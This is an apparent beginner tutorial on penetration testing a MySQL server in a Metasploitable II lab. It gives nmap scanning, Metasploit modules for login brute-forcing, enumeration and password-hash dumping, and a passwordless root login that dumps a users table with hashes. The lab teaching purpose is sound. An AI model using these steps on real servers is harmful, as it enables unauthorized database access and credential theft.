Beginner Guide of mysql Penetration Testing

In this article we are going to perform penetration testing on mysql server, here we will perform attack through metasploit framework.

Attacker: kali Linux

Target: metasploitable II

Lets Begin!!

192.168.1.103 is our target IP. Firstly type NMAP command to scan the target IP to make sure whether the mysql service is running on host IP or not. Here you can see port 3306 is open for mysql service.

nmap -sV 192.168.1.103

Now start the metasploit type type following command in kali terminal

Msfconsole

Enumerates the version of MySQL servers.

msf > use auxiliary/scanner/mysql/mysql_version

msf auxiliary(mysql_version) > set rhosts 192.168.1.103

msf auxiliary(mysql_version) > set rport 3306

msf auxiliary(mysql_version) >expoit

Here it had shown the version of MYSQL is 5.0.51a-3ubuntu5 and if you noticed the same result we have got from nmap version scan.

This module simply queries the MySQL instance for a specific user/pass (default is root with blank).

msf > use auxiliary/scanner/mysql/mysql_login

msf auxiliary(mysql_login) > set rhosts 192.168.1.103

msf auxiliary(mysql_login) > set rport 3306

msf auxiliary(mysql_login) > set user_file /root/Desktop/users.txt

msf auxiliary(mysql_login) > set pass_file /root/Desktop/password.txt

msf auxiliary(mysql_login) > exploit

Here we got successful result as root which does not required any password for login into mysql server.

This module allows for simple enumeration of MySQL Database Server provided proper credentials to connect remotely.

msf > use auxiliary/admin/mysql/mysql_enum

msf auxiliary(mysql_enum) > set rhost 192.168.1.103

msf auxiliary(mysql_enum) > set username root

msf auxiliary(mysql_enum) > exploit

This module extracts the usernames and encrypted password hashes from a MySQL server and stores them for later cracking.

msf > use auxiliary/scanner/mysql/mysql_hashdump

msf auxiliary(mysql_hashdump) > set rhosts 192.168.1.103

msf auxiliary(mysql_hashdump) > set username root

msf auxiliary(mysql_hashdump) > exploit

Now from screenshot you can read the password given for users.

Now we have enumerated much information with the help of metasploit now let’s try to connect with MYSQL server in order to dump its data. Type following command on terminal

mysql -h 192.168.1.103 -u root –p

Hit enter for password; here we got access of MYSQL server now I am going to fetch its data.

mysql> show databases;

it has shown all databases name present inside it. Let’s check the tables inside the dvwa.

mysql> show tables from dvwa;

Let’s fetch the data inside dvwa database; now type following command.

mysql> use dvwa;

Now we can fetch the data present inside the database dvwa.

mysql> show tables;

mysql> select * from users;

Now you can see I have got all users name with their hash password.

Try it yourself for others database details.